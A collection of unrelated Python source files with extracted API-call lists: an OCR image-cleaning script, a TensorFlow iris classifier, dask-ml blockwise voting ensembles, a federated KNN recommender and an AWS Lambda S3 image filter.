setPixelsMovingToTop(image, x-1, y, oldvalue, newvalue, visited)
def setPixelsMovingToLeft(image, x, y, oldvalue, newvalue, visited ):
image[y,x] = newvalue
visited[y,x] = 1
if x > 0 and oldvalue == image[y,x-1]:
visited[y,x-1] = 1
setPixelsMovingToLeft(image, x-1, y, oldvalue, newvalue, visited)
if y > 0 and oldvalue == image[y-1, x] and visited[y-1,x] ==0:
visited[y-1,x] = 1
setPixelsMovingToLeft(image, x, y-1, oldvalue, newvalue, visited)
if y < image.shape[0]-1 and oldvalue == image[y+1, x] and visited[y+1,x] ==0:
visited[y+1,x] = 1
setPixelsMovingToLeft(image, x, y+1, oldvalue, newvalue, visited)
def setPixelsMovingToBottom(image, x, y, oldvalue, newvalue, visited ):
image[y,x] = newvalue
visited[y,x] = 1
if y < image.shape[0]-1 and oldvalue == image[y+1,x]:
visited[y+1,x] = 1
setPixelsMovingToBottom(image, x, y+1, oldvalue, newvalue, visited)
if x < image.shape[1]-1 and oldvalue == image[y, x+1] and visited[y,x+1] ==0:
visited[y,x+1] = 1
setPixelsMovingToBottom(image, x+1, y, oldvalue, newvalue, visited)
if x > 0 and oldvalue == image[y, x-1] and visited[y,x-1] ==0:
visited[y,x-1] = 1
setPixelsMovingToBottom(image, x-1, y, oldvalue, newvalue, visited)
def setPixelsMovingToRight(image, x, y, oldvalue, newvalue, visited ):
image[y,x] = newvalue
visited[y,x] = 1
if x < image.shape[1]-1 and oldvalue == image[y,x+1]:
visited[y,x+1]=1
setPixelsMovingToRight(image, x+1, y, oldvalue, newvalue, visited)
if y > 0 and oldvalue == image[y-1, x] and visited[y-1,x] ==0:
visited[y-1,x] = 1
setPixelsMovingToRight(image, x, y-1, oldvalue, newvalue, visited)
if y < image.shape[0]-1 and oldvalue == image[y+1, x] and visited[y+1,x] ==0:
visited[y+1,x] = 1
setPixelsMovingToRight(image, x, y+1, oldvalue, newvalue, visited)
def setBoundingBoxForPixel(image, x, y, oldvalue, newvalue):
visited = np.zeros(image.shape, dtype=np.int8)
setPixelsMovingToTop(image, x, y, oldvalue, newvalue, visited)
setPixelsMovingToBottom(image, x, y, oldvalue, newvalue, visited)
setPixelsMovingToLeft(image, x, y, oldvalue, newvalue, visited)
setPixelsMovingToRight(image, x, y, oldvalue, newvalue, visited)
def extractText(image, imagePath):
# grab the image dimensions
h = image.shape[0]
w = image.shape[1]
if debug:
debugImage(image, imagePath, 0, "Starting image")
## Remove noise and preserve edges
## diameter of pixel neighourhood
## sigmaColor - the larger this value the more distant the color in the neighbourhood will influence color
## sigmaSpace - the larger this value the more pixels further away will influence the colour blending
image= cv2.bilateralFilter(image,5, 55,60)
if debug:
debugImage(image, imagePath, 1, "After filter")
## convert to greyscale
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
if debug:
debugImage(image, imagePath, 2, "Conversion to greyscale", True)
# Here are the possible options for thresholding THRESH_BINARY_INV
# seems to work best.
# It returns the threshold used and the image.
thresholdLevel, image = cv2.threshold(image, 240, 255, cv2.THRESH_BINARY_INV)
if debug:
debugImage(image, imagePath, 3, "After thresholding (level used: {})".format(thresholdLevel), True)
# if we have more black than white then we have that as our expected text colour
black = 0
for y in range(0,h):
for x in range(0,w):
if image[y,x] == 0:
black += 1
if black / (h * w) > 0.8: # lots of black so text is white
textColor = 255
backgroundColor = 0
else: # lots of white so text is black
textColor = 0
backgroundColor = 255
# this is out custom code that captures a connected block within the image
n = 300
nn = 100
if debug:
print("Processing connected shapes")
globalVisited = np.zeros(image.shape)
for y in range(0,h):
for x in range(0,w):
if globalVisited[y,x] == 0 and image[y,x] == 0:
bounds = getBoundingBoxForPixel(image,x,y, textColor)
if bounds["height"] < 7 or (bounds["height"] / image.shape[0]) > 0.8:
if debug:
print("{}: ({},{}) w={} h={} top={} bottom={}".format(n, x, y, bounds["width"], bounds["height"], bounds["top"], bounds["bottom"]))
debugImage(bounds["visited"], imagePath, n, "connected shape", True)
n += 1
setBoundingBoxForPixel(image, x, y, textColor, backgroundColor)
if debug:
debugImage(image, imagePath, nn, "image after removal of connected shape", True)
nn += 1
globalVisited = np.logical_or(globalVisited, bounds["visited"])
if debug:
debugImage(image, imagePath, 4, "Remove small items and large blocks of stuff", True)
# TODO tesseract is not great at finding spaces e.g. I LOVE and IT LOOK
# after the last bit of processing we have a pretty good idea of the space
# between letters so we could write our own space detector...
return image
image = np.array(Image.open(imagePath))
image = extractText(image, imagePath)
text = pytesseract.image_to_string(image, lang='eng', config=customConfig)
text = text.strip() ## remove last newline
text = re.sub("\n\n+", "\n", text) ## replace multiple newlines with a single one
print(text.replace('\n', newlineChar)) ## convert newline to <br/>
| [
"matplotlib.pyplot.title",
"json.load",
"cv2.cvtColor",
"matplotlib.pyplot.close",
"cv2.threshold",
"matplotlib.pyplot.yticks",
"numpy.zeros",
"matplotlib.pyplot.imshow",
"pytesseract.image_to_string",
"PIL.Image.open",
"cv2.bilateralFilter",
"os.path.isfile",
"matplotlib.pyplot.figure",
"... | [((346, 376), 'sys.setrecursionlimit', 'sys.setrecursionlimit', (['(10 ** 6)'], {}), '(10 ** 6)\n', (367, 376), False, 'import sys\n'), ((11401, 11468), 'pytesseract.image_to_string', 'pytesseract.image_to_string', (['image'], {'lang': '"""eng"""', 'config': 'customConfig'}), "(image, lang='eng', config=customConfig)\n", (11428, 11468), False, 'import pytesseract\n'), ((11535, 11562), 're.sub', 're.sub', (['"""\n\n+"""', '"""\n"""', 'text'], {}), "('\\n\\n+', '\\n', text)\n", (11541, 11562), False, 'import re\n'), ((449, 479), 'os.path.isfile', 'os.path.isfile', (['configJsonPath'], {}), '(configJsonPath)\n', (463, 479), False, 'import os\n'), ((1118, 1136), 'json.load', 'json.load', (['in_file'], {}), '(in_file)\n', (1127, 1136), False, 'import json\n'), ((1411, 1438), 'os.path.splitext', 'os.path.splitext', (['imagePath'], {}), '(imagePath)\n', (1427, 1438), False, 'import os\n'), ((1441, 1469), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 10)'}), '(figsize=(10, 10))\n', (1451, 1469), True, 'import matplotlib.pyplot as plt\n'), ((1589, 1603), 'matplotlib.pyplot.xticks', 'plt.xticks', (['[]'], {}), '([])\n', (1599, 1603), True, 'import matplotlib.pyplot as plt\n'), ((1608, 1622), 'matplotlib.pyplot.yticks', 'plt.yticks', (['[]'], {}), '([])\n', (1618, 1622), True, 'import matplotlib.pyplot as plt\n'), ((1701, 1712), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (1710, 1712), True, 'import matplotlib.pyplot as plt\n'), ((4841, 4877), 'numpy.zeros', 'np.zeros', (['image.shape'], {'dtype': 'np.int8'}), '(image.shape, dtype=np.int8)\n', (4849, 4877), True, 'import numpy as np\n'), ((4941, 4977), 'numpy.zeros', 'np.zeros', (['image.shape'], {'dtype': 'np.int8'}), '(image.shape, dtype=np.int8)\n', (4949, 4977), True, 'import numpy as np\n'), ((5037, 5073), 'numpy.zeros', 'np.zeros', (['image.shape'], {'dtype': 'np.int8'}), '(image.shape, dtype=np.int8)\n', (5045, 5073), True, 'import numpy as np\n'), ((5705, 5741), 'numpy.zeros', 'np.zeros', (['image.shape'], {'dtype': 'np.int8'}), '(image.shape, dtype=np.int8)\n', (5713, 5741), True, 'import numpy as np\n'), ((8235, 8271), 'numpy.zeros', 'np.zeros', (['image.shape'], {'dtype': 'np.int8'}), '(image.shape, dtype=np.int8)\n', (8243, 8271), True, 'import numpy as np\n'), ((9010, 9047), 'cv2.bilateralFilter', 'cv2.bilateralFilter', (['image', '(5)', '(55)', '(60)'], {}), '(image, 5, 55, 60)\n', (9029, 9047), False, 'import cv2\n'), ((9147, 9186), 'cv2.cvtColor', 'cv2.cvtColor', (['image', 'cv2.COLOR_BGR2GRAY'], {}), '(image, cv2.COLOR_BGR2GRAY)\n', (9159, 9186), False, 'import cv2\n'), ((9437, 9490), 'cv2.threshold', 'cv2.threshold', (['image', '(240)', '(255)', 'cv2.THRESH_BINARY_INV'], {}), '(image, 240, 255, cv2.THRESH_BINARY_INV)\n', (9450, 9490), False, 'import cv2\n'), ((10159, 10180), 'numpy.zeros', 'np.zeros', (['image.shape'], {}), '(image.shape)\n', (10167, 10180), True, 'import numpy as np\n'), ((11333, 11354), 'PIL.Image.open', 'Image.open', (['imagePath'], {}), '(imagePath)\n', (11343, 11354), False, 'from PIL import Image\n'), ((1485, 1501), 'matplotlib.pyplot.title', 'plt.title', (['title'], {}), '(title)\n', (1494, 1501), True, 'import matplotlib.pyplot as plt\n'), ((1522, 1552), 'matplotlib.pyplot.imshow', 'plt.imshow', (['image'], {'cmap': '"""gray"""'}), "(image, cmap='gray')\n", (1532, 1552), True, 'import matplotlib.pyplot as plt\n'), ((1567, 1584), 'matplotlib.pyplot.imshow', 'plt.imshow', (['image'], {}), '(image)\n', (1577, 1584), True, 'import matplotlib.pyplot as plt\n'), ((953, 978), 'os.path.isfile', 'os.path.isfile', (['imagePath'], {}), '(imagePath)\n', (967, 978), False, 'import os\n'), ((10919, 10966), 'numpy.logical_or', 'np.logical_or', (['globalVisited', "bounds['visited']"], {}), "(globalVisited, bounds['visited'])\n", (10932, 10966), True, 'import numpy as np\n')] |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import numpy as np
print("start")
# Data sets
IRIS_TRAINING = "iris_training.csv"
IRIS_TEST = "iris_test.csv"
# Load datasets.
print("load")
training_set = tf.contrib.learn.datasets.base.load_csv(filename=IRIS_TRAINING,
target_dtype=np.int)
test_set = tf.contrib.learn.datasets.base.load_csv(filename=IRIS_TEST,
target_dtype=np.int)
print("feature")
# Specify that all features have real-value data
feature_columns = [tf.contrib.layers.real_valued_column("", dimension=4)]
print("classier")
# Build 3 layer DNN with 10, 20, 10 units respectively.
classifier = tf.contrib.learn.DNNClassifier(feature_columns=feature_columns,
hidden_units=[10, 20, 10],
n_classes=3,
model_dir="tmp/iris_model")
# Fit model.
print("fitter")
classifier.fit(x=training_set.data,
y=training_set.target,
steps=2000)
# Evaluate accuracy.
print("scorer")
accuracy_score = classifier.evaluate(x=test_set.data,
y=test_set.target)["accuracy"]
print('Accuracy: {0:f}'.format(accuracy_score))
# Classify two new flower samples.
new_samples = np.array(
[[6.4, 3.2, 4.5, 1.5], [5.8, 3.1, 5.0, 1.7]], dtype=float)
y = classifier.predict(new_samples)
print('Predictions: {}'.format(str(y))) | [
"tensorflow.contrib.layers.real_valued_column",
"tensorflow.contrib.learn.datasets.base.load_csv",
"numpy.array",
"tensorflow.contrib.learn.DNNClassifier"
] | [((291, 379), 'tensorflow.contrib.learn.datasets.base.load_csv', 'tf.contrib.learn.datasets.base.load_csv', ([], {'filename': 'IRIS_TRAINING', 'target_dtype': 'np.int'}), '(filename=IRIS_TRAINING,\n target_dtype=np.int)\n', (330, 379), True, 'import tensorflow as tf\n'), ((442, 527), 'tensorflow.contrib.learn.datasets.base.load_csv', 'tf.contrib.learn.datasets.base.load_csv', ([], {'filename': 'IRIS_TEST', 'target_dtype': 'np.int'}), '(filename=IRIS_TEST, target_dtype=np.int\n )\n', (481, 527), True, 'import tensorflow as tf\n'), ((803, 938), 'tensorflow.contrib.learn.DNNClassifier', 'tf.contrib.learn.DNNClassifier', ([], {'feature_columns': 'feature_columns', 'hidden_units': '[10, 20, 10]', 'n_classes': '(3)', 'model_dir': '"""tmp/iris_model"""'}), "(feature_columns=feature_columns,\n hidden_units=[10, 20, 10], n_classes=3, model_dir='tmp/iris_model')\n", (833, 938), True, 'import tensorflow as tf\n'), ((1456, 1523), 'numpy.array', 'np.array', (['[[6.4, 3.2, 4.5, 1.5], [5.8, 3.1, 5.0, 1.7]]'], {'dtype': 'float'}), '([[6.4, 3.2, 4.5, 1.5], [5.8, 3.1, 5.0, 1.7]], dtype=float)\n', (1464, 1523), True, 'import numpy as np\n'), ((660, 713), 'tensorflow.contrib.layers.real_valued_column', 'tf.contrib.layers.real_valued_column', (['""""""'], {'dimension': '(4)'}), "('', dimension=4)\n", (696, 713), True, 'import tensorflow as tf\n')] |
import dask
import dask.array as da
import dask.dataframe as dd
import numpy as np
import sklearn.base
from sklearn.utils.validation import check_is_fitted
from ..base import ClassifierMixin, RegressorMixin
from ..utils import check_array
class BlockwiseBase(sklearn.base.BaseEstimator):
def __init__(self, estimator):
self.estimator = estimator
def _check_array(self, X):
return check_array(
X,
accept_dask_dataframe=True,
accept_unknown_chunks=True,
preserve_pandas_dataframe=True,
)
def fit(self, X, y, **kwargs):
X = self._check_array(X)
estimatord = dask.delayed(self.estimator)
Xs = X.to_delayed()
ys = y.to_delayed()
if isinstance(X, da.Array):
Xs = Xs.flatten()
if isinstance(y, da.Array):
ys = ys.flatten()
if len(Xs) != len(ys):
raise ValueError(
f"The number of blocks in X and y must match. {len(Xs)} != {len(ys)}"
)
estimators = [
dask.delayed(sklearn.base.clone)(estimatord) for _ in range(len(Xs))
]
results = [
estimator_.fit(X_, y_, **kwargs)
for estimator_, X_, y_, in zip(estimators, Xs, ys)
]
results = list(dask.compute(*results))
self.estimators_ = results
def _predict(self, X):
"""Collect results from many predict calls"""
if isinstance(self, ClassifierMixin):
dtype = "int64"
else:
dtype = "float64"
if isinstance(X, da.Array):
chunks = (X.chunks[0], len(self.estimators_))
combined = X.map_blocks(
_predict_stack,
estimators=self.estimators_,
dtype=np.dtype(dtype),
chunks=chunks,
)
elif isinstance(X, dd._Frame):
meta = np.empty((0, len(self.classes_)), dtype=dtype)
combined = X.map_partitions(
_predict_stack, estimators=self.estimators_, meta=meta
)
else:
# TODO: this should be done in parallel?
combined = np.vstack(
[estimator.predict(X) for estimator in self.estimators_]
).T
return combined
class BlockwiseVotingClassifier(ClassifierMixin, BlockwiseBase):
"""
Blockwise training and ensemble voting classifier.
This classifier trains on blocks / partitions of Dask Arrays or DataFrames.
A cloned version of `estimator` will be fit *independently* on each block
or partition of the Dask collection. This is useful when the sub estimator
only works on small in-memory data structures like a NumPy array or pandas
DataFrame.
Prediction is done by the *ensemble* of learned models.
.. warning::
Ensure that your data are sufficiently shuffled prior to training!
If the values of the various blocks / partitions of your dataset are not
distributed similarly, the classifier will give poor results.
Parameters
----------
estimator : Estimator
voting : str, {'hard', 'soft'} (default='hard')
If 'hard', uses predicted class labels for majority rule voting.
Else if 'soft', predicts the class label based on the argmax of
the sums of the predicted probabilities, which is recommended for
an ensemble of well-calibrated classifiers.
classes : list-like, optional
The set of classes that `y` can take. This can also be provided as
a fit param if the underlying estimator requires `classes` at fit time.
Attributes
----------
estimators_ : list of classifiers
The collection of fitted sub-estimators that are `estimator` fitted
on each partition / block of the inputs.
classes_ : array-like, shape (n_predictions,)
The class labels.
Examples
--------
>>> import dask_ml.datasets
>>> import dask_ml.ensemble
>>> import sklearn.linear_model
>>> X, y = dask_ml.datasets.make_classification(n_samples=100_000,
>>> ... chunks=10_000)
>>> subestimator = sklearn.linear_model.RidgeClassifier(random_state=0)
>>> clf = dask_ml.ensemble.BlockwiseVotingClassifier(
>>> ... subestimator,
>>> ... classes=[0, 1]
>>> ... )
>>> clf.fit(X, y)
"""
def __init__(self, estimator, voting="hard", classes=None):
self.voting = voting
self.classes = classes
super().__init__(estimator)
def fit(self, X, y, **kwargs):
if self.classes is None and "classes" not in kwargs:
raise ValueError("Must provide the classes of `y`.")
elif self.classes is not None:
classes = self.classes
else:
classes = kwargs["classes"]
super().fit(X, y, **kwargs)
self.classes_ = np.array(classes)
def predict(self, X):
check_is_fitted(self, attributes=["estimators_"])
X = self._check_array(X)
# TODO: check for just row-wise partition!
if self.voting == "soft":
maj = np.argmax(self.predict_proba(X), axis=1)
else: # 'hard' voting
predictions = self._predict(X) # (N, n_estimators) ensure chunking!
if isinstance(predictions, da.Array):
maj = predictions.map_blocks(_vote_block, dtype="int64", drop_axis=1)
else:
maj = _vote_block(predictions)
return maj
@property
def predict_proba(self):
if self.voting == "hard":
raise AttributeError(
"predict_proba is not available when" " voting=%r" % self.voting
)
return self._predict_proba
def _predict_proba(self, X):
check_is_fitted(self, attributes=["estimators_"])
X = self._check_array(X)
avg = np.average(self._collect_probas(X), axis=0)
return avg
def _collect_probas(self, X):
if isinstance(X, da.Array):
chunks = (len(self.estimators_), X.chunks[0], len(self.classes_))
meta = np.array([], dtype="float64")
# (n_estimators, len(X), n_classes)
combined = X.map_blocks(
_predict_proba_stack,
estimators=self.estimators_,
chunks=chunks,
meta=meta,
)
elif isinstance(X, dd._Frame):
# TODO: replace with a _predict_proba_stack version.
# This current raises; dask.dataframe doesn't like map_partitions that
# return new axes.
# meta = np.empty((len(self.estimators_), 0, len(self.classes_)),
# dtype="float64")
# combined = X.map_partitions(_predict_proba_stack, meta=meta,
# estimators=self.estimators_)
# combined._chunks = ((len(self.estimators_),),
# (np.nan,) * X.npartitions,
# (len(X.columns),))
meta = np.empty((0, len(self.classes_)), dtype="float64")
probas = [
X.map_partitions(_predict_proba, meta=meta, estimator=estimator)
for estimator in self.estimators_
]
# TODO(https://github.com/dask/dask/issues/6177): replace with da.stack
chunks = probas[0]._chunks
for proba in probas:
proba._chunks = ((1,) * len(chunks[0]), chunks[1])
combined = da.stack(probas)
combined._chunks = ((1,) * len(self.estimators_),) + chunks
else:
# ndarray, etc.
combined = np.stack(
[estimator.predict_proba(X) for estimator in self.estimators_]
)
return combined
class BlockwiseVotingRegressor(RegressorMixin, BlockwiseBase):
"""
Blockwise training and ensemble voting regressor.
This regressor trains on blocks / partitions of Dask Arrays or DataFrames.
A cloned version of `estimator` will be fit *independently* on each block
or partition of the Dask collection.
Prediction is done by the *ensemble* of learned models.
.. warning::
Ensure that your data are sufficiently shuffled prior to training!
If the values of the various blocks / partitions of your dataset are not
distributed similarly, the regressor will give poor results.
Parameters
----------
estimator : Estimator
Attributes
----------
estimators_ : list of regressors
The collection of fitted sub-estimators that are `estimator` fitted
on each partition / block of the inputs.
Examples
--------
>>> import dask_ml.datasets
>>> import dask_ml.ensemble
>>> import sklearn.linear_model
>>> X, y = dask_ml.datasets.make_regression(n_samples=100_000,
... chunks=10_000)
>>> subestimator = sklearn.linear_model.LinearRegression()
>>> clf = dask_ml.ensemble.BlockwiseVotingRegressor(
... subestimator,
... )
>>> clf.fit(X, y)
"""
def predict(self, X):
check_is_fitted(self, attributes=["estimators_"])
return np.average(self._predict(X), axis=1)
def fit(estimator, x, y):
# TODO: logging
estimator.fit(x, y)
return estimator
def _predict_proba(part, estimator):
return estimator.predict_proba(part)
def _vote(x):
return np.argmax(np.bincount(x))
def _vote_block(block):
return np.apply_along_axis(_vote, 1, block)
def _predict_stack(part, estimators):
# predict for a batch of estimators and stack up the results.
batches = [estimator.predict(part) for estimator in estimators]
return np.vstack(batches).T
def _predict_proba_stack(part, estimators):
# predict for a batch of estimators and stack up the results.
batches = [estimator.predict_proba(part) for estimator in estimators]
return np.stack(batches)
| [
"numpy.stack",
"dask.delayed",
"numpy.dtype",
"dask.array.stack",
"sklearn.utils.validation.check_is_fitted",
"numpy.apply_along_axis",
"numpy.array",
"dask.compute",
"numpy.bincount",
"numpy.vstack"
] | [((9580, 9616), 'numpy.apply_along_axis', 'np.apply_along_axis', (['_vote', '(1)', 'block'], {}), '(_vote, 1, block)\n', (9599, 9616), True, 'import numpy as np\n'), ((10020, 10037), 'numpy.stack', 'np.stack', (['batches'], {}), '(batches)\n', (10028, 10037), True, 'import numpy as np\n'), ((660, 688), 'dask.delayed', 'dask.delayed', (['self.estimator'], {}), '(self.estimator)\n', (672, 688), False, 'import dask\n'), ((4934, 4951), 'numpy.array', 'np.array', (['classes'], {}), '(classes)\n', (4942, 4951), True, 'import numpy as np\n'), ((4987, 5036), 'sklearn.utils.validation.check_is_fitted', 'check_is_fitted', (['self'], {'attributes': "['estimators_']"}), "(self, attributes=['estimators_'])\n", (5002, 5036), False, 'from sklearn.utils.validation import check_is_fitted\n'), ((5831, 5880), 'sklearn.utils.validation.check_is_fitted', 'check_is_fitted', (['self'], {'attributes': "['estimators_']"}), "(self, attributes=['estimators_'])\n", (5846, 5880), False, 'from sklearn.utils.validation import check_is_fitted\n'), ((9215, 9264), 'sklearn.utils.validation.check_is_fitted', 'check_is_fitted', (['self'], {'attributes': "['estimators_']"}), "(self, attributes=['estimators_'])\n", (9230, 9264), False, 'from sklearn.utils.validation import check_is_fitted\n'), ((9527, 9541), 'numpy.bincount', 'np.bincount', (['x'], {}), '(x)\n', (9538, 9541), True, 'import numpy as np\n'), ((9802, 9820), 'numpy.vstack', 'np.vstack', (['batches'], {}), '(batches)\n', (9811, 9820), True, 'import numpy as np\n'), ((1316, 1338), 'dask.compute', 'dask.compute', (['*results'], {}), '(*results)\n', (1328, 1338), False, 'import dask\n'), ((6159, 6188), 'numpy.array', 'np.array', (['[]'], {'dtype': '"""float64"""'}), "([], dtype='float64')\n", (6167, 6188), True, 'import numpy as np\n'), ((1076, 1108), 'dask.delayed', 'dask.delayed', (['sklearn.base.clone'], {}), '(sklearn.base.clone)\n', (1088, 1108), False, 'import dask\n'), ((7577, 7593), 'dask.array.stack', 'da.stack', (['probas'], {}), '(probas)\n', (7585, 7593), True, 'import dask.array as da\n'), ((1806, 1821), 'numpy.dtype', 'np.dtype', (['dtype'], {}), '(dtype)\n', (1814, 1821), True, 'import numpy as np\n')] |
import numpy as np
import pandas as pd
from definitions import ROOT_DIR
import logging.config
import helpers
from data_handler import DataHandler
from knn_user import KNNUser
DS_PATH = ROOT_DIR + "/datasets/ml-latest-small"
class SimpleKNNFederator:
logging.config.fileConfig(ROOT_DIR + "/logging.conf", disable_existing_loggers=False)
log = logging.getLogger(__name__)
def __init__(self, user_id, n, base_n):
ds_base_path = "/datasets/ml-latest-small"
ds_path = ROOT_DIR + ds_base_path + "/ratings.csv"
movie_id_col = 1
self.log.info("Golden List:")
num_of_recs = 20
golden_list = KNNUser(user_id, data_path=ds_base_path, p_thresh=5, u_thresh=5).make_recommendation(num_of_recs)
data = DataHandler(filename=ds_path, dtype=np.uint32, cols=4)
data.set_dataset(data.sort_dataset_by_col(movie_id_col))
num_of_alg_subsets = 5
split_datasets = data.split_dataset_intermittently(num_of_alg_subsets)
split_recommendations = self.knn_split_datasets(split_datasets, user_id, num_of_recs)
federated_recommendations = self.federate_split_recommendations(split_recommendations, n)
helpers.pretty_print_results(self.log, federated_recommendations, user_id)
self.log.info("Score: %.3f" % self.measure_effectiveness(federated_recommendations, n, golden_list, base_n))
# TODO: put in a different helper file
def knn_split_datasets(self, split_datasets, user_id, num_of_recs=20):
split_recommendations = []
for i in range(len(split_datasets)):
knnu = KNNUser(user_id, ds_ratings=helpers.convert_np_to_pandas(split_datasets[i]),
p_thresh=0, u_thresh=0)
split_recommendations.append(knnu.make_recommendation(num_of_recs=num_of_recs))
a = np.concatenate(split_recommendations)
return a[a[:, 2].argsort()] # sort the array by distance
@staticmethod
def federate_split_recommendations(recommendations, n):
federated_recommendations = []
chosen_names = []
entries = 0
count = 0
while entries < n:
movie = recommendations[count]
name = movie[1]
dist = movie[2]
if name not in chosen_names:
chosen_names.append(name)
federated_recommendations.append([entries+1, name, dist])
entries += 1
count += 1
return federated_recommendations
def measure_effectiveness(self, actual, actual_n, golden, golden_n): # TODO: Replace with a real metric measurer
golden_dict = {}
score = 1.0
for row in golden:
golden_dict[row[1]] = row[0]
for row in actual:
name = row[1]
position = row[0]
if name in golden_dict:
score -= (1/actual_n)*((abs(golden_dict[name] - position))/golden_n)
else:
score -= (1/actual_n)
return score
# Test with user 1
if __name__ == '__main__':
user_id = 1
n_neighbours = 20
base_n_neighbours = 200
federator = SimpleKNNFederator(user_id, n_neighbours, base_n_neighbours)
| [
"helpers.convert_np_to_pandas",
"knn_user.KNNUser",
"data_handler.DataHandler",
"helpers.pretty_print_results",
"numpy.concatenate"
] | [((762, 816), 'data_handler.DataHandler', 'DataHandler', ([], {'filename': 'ds_path', 'dtype': 'np.uint32', 'cols': '(4)'}), '(filename=ds_path, dtype=np.uint32, cols=4)\n', (773, 816), False, 'from data_handler import DataHandler\n'), ((1192, 1266), 'helpers.pretty_print_results', 'helpers.pretty_print_results', (['self.log', 'federated_recommendations', 'user_id'], {}), '(self.log, federated_recommendations, user_id)\n', (1220, 1266), False, 'import helpers\n'), ((1834, 1871), 'numpy.concatenate', 'np.concatenate', (['split_recommendations'], {}), '(split_recommendations)\n', (1848, 1871), True, 'import numpy as np\n'), ((648, 712), 'knn_user.KNNUser', 'KNNUser', (['user_id'], {'data_path': 'ds_base_path', 'p_thresh': '(5)', 'u_thresh': '(5)'}), '(user_id, data_path=ds_base_path, p_thresh=5, u_thresh=5)\n', (655, 712), False, 'from knn_user import KNNUser\n'), ((1630, 1677), 'helpers.convert_np_to_pandas', 'helpers.convert_np_to_pandas', (['split_datasets[i]'], {}), '(split_datasets[i])\n', (1658, 1677), False, 'import helpers\n')] |
import json
import urllib.parse
import boto3
print('Loading function')
s3 = boto3.client('s3')
import os
def lambda_handler(event, context):
# Get the object from the event and show its content type
bucket = event['Records'][0]['s3']['bucket']['name']
key = urllib.parse.unquote_plus(event['Records'][0]['s3']['object']['key'], encoding='utf-8')
try:
print(os.listdir('/opt/python/lib/python3.7/site-packages'))
import cv2
import numpy as np
# read image from s3
response = s3.get_object(Bucket=bucket, Key=key)
print("CONTENT TYPE: " + response['ContentType'])
body = response['Body'].read()
#
src = cv2.imdecode(np.asarray(bytearray(body)), cv2.IMREAD_GRAYSCALE)
# Resize to TARGET x TARGET in landscape or portrait
TARGET = 512
TARGET_PORTRAIT = 350
org_height = src.shape[0]
org_width = src.shape[1]
scale_percent = 1
landscape = True
portrait_style = False
if (org_height>org_width):
scale_percent = TARGET_PORTRAIT / org_height
landscape = False
portrait_style = True
else:
scale_percent = TARGET / org_width
resulting_height = int(src.shape[0] * scale_percent)
if (resulting_height>TARGET_PORTRAIT):
scale_percent = TARGET_PORTRAIT / org_height
landscape = False
# new size
width = int(src.shape[1] * scale_percent)
height = int(src.shape[0] * scale_percent)
dsize = (width, height)
src = cv2.resize(src, dsize)
# apply guassian blur on src image
src = cv2.GaussianBlur(src,(3,3),cv2.BORDER_DEFAULT)
src = cv2.Sobel(src,cv2.CV_8U,1,1,ksize=5)
top_pixel = np.percentile(src,97)
src = cv2.convertScaleAbs(src, alpha=(250/top_pixel), beta=0)
src = cv2.GaussianBlur(src,(3,3),cv2.BORDER_DEFAULT)
# read background from local layer
bck = cv2.imread('/opt/python/blackboard/blackboard_wide_2.png', cv2.IMREAD_GRAYSCALE)
beta = 0.6
offset_x = 250
offset_y = 5
for y in range(src.shape[0]):
for x in range(src.shape[1]):
new_pixel = bck[y+offset_y,x+offset_x]+beta*src[y,x];
new_pixel = 255 if new_pixel > 255 else new_pixel
bck[y+offset_y,x+offset_x] = np.uint8(new_pixel)
if not landscape:
# clip image
actual_width = offset_x + src.shape[1] + 5
actual_width = actual_width if actual_width < 768 else 767
bck = bck[:,0:actual_width]
# put image back to public s3 bucket
image_string = cv2.imencode('.jpg', bck)[1].tostring()
s3.put_object(Bucket='<bucket-name>', Key=key+'.jpg', Body=image_string)
# resize to 1.91 : 1 scale for FB
alpha = 1.905
ww = bck.shape[1]
hh = bck.shape[0]
min_h = -(alpha * hh - ww) / 2 / alpha
dh = 0
dw = 0
if min_h >= 0:
v_h = - (alpha * hh - ww) * (alpha * hh - ww) / 4 / alpha
if v_h > 0:
dh = min_h
dw = alpha*(dh+hh)-ww
else:
dw = 0
dh = (dw + ww)/alpha - hh
else:
#v_h = - (alpha * hh - ww) * (alpha * hh - ww) / 4 / alpha
#if v_h >= 0:
# dh = 0
# dw = alpha*(dh+hh)-ww
#else:
# dw = 0
# dh = (dw + ww)/alpha - hh
dh = 0
dw = alpha*(dh+hh)-ww
dh = int(dh)
dw = int(dw)
if dh<0 or dw<0:
print('false compute '+str(dh)+' '+str(dw))
dh = 0
dw = 0
if dh>300 or dw > 600:
print('too large values '+str(dh)+' '+str(dw))
dh = 0
dw = 0
top, bottom = dh//2, dh-(dh//2)
left, right = dw//2, dw-(dw//2)
color = [0, 0, 0]
extended = cv2.copyMakeBorder(bck, top, bottom, left, right, cv2.BORDER_CONSTANT,value=color)
#extended = cv2.copyMakeBorder(bck, top, bottom, left, right, cv2.BORDER_REFLECT)
# ensure min width for large scale display
scale_factor = 768/extended.shape[1]
new_width = int(scale_factor*extended.shape[1])
new_heigt = int(scale_factor*extended.shape[0])
if dh==0 and dw==0:
...
else:
new_width = 768
new_height = 403
scaled_just_photo_dsize = (new_width,new_heigt)
extended = cv2.resize(extended, scaled_just_photo_dsize)
extended_string_photo = cv2.imencode('.jpg', extended)[1].tostring()
s3.put_object(Bucket='<bucket-name>', Key=key+'-url.jpg', Body=extended_string_photo)
return response['ContentType']
#actual_width = offset_x + src.shape[1] + 5
#actual_width = actual_width if actual_width < 768 else 767
#actual_height = offset_y + src.shape[0] + 5
#actual_height = actual_height if actual_height < 360 else 359
#just_photo = bck[0:actual_height,offset_x:actual_width]
#scale_factor = 2
#if portrait_style:
# scale_factor = 3
#scaled_just_photo_dsize = (scale_factor*just_photo.shape[1],scale_factor*just_photo.shape[0])
#scaled_just_photo = cv2.resize(just_photo, scaled_just_photo_dsize)
#image_string_photo = cv2.imencode('.jpg', scaled_just_photo)[1].tostring()
#s3.put_object(Bucket='<bucket-name>', Key=key+'-url.jpg', Body=image_string_photo)
#return response['ContentType']
except Exception as e:
print(e)
print('Error getting object {} from bucket {}. Make sure they exist and your bucket is in the same region as this function.'.format(key, bucket))
raise e
| [
"os.listdir",
"cv2.GaussianBlur",
"numpy.uint8",
"boto3.client",
"cv2.copyMakeBorder",
"numpy.percentile",
"cv2.imread",
"cv2.convertScaleAbs",
"cv2.imencode",
"cv2.Sobel",
"cv2.resize"
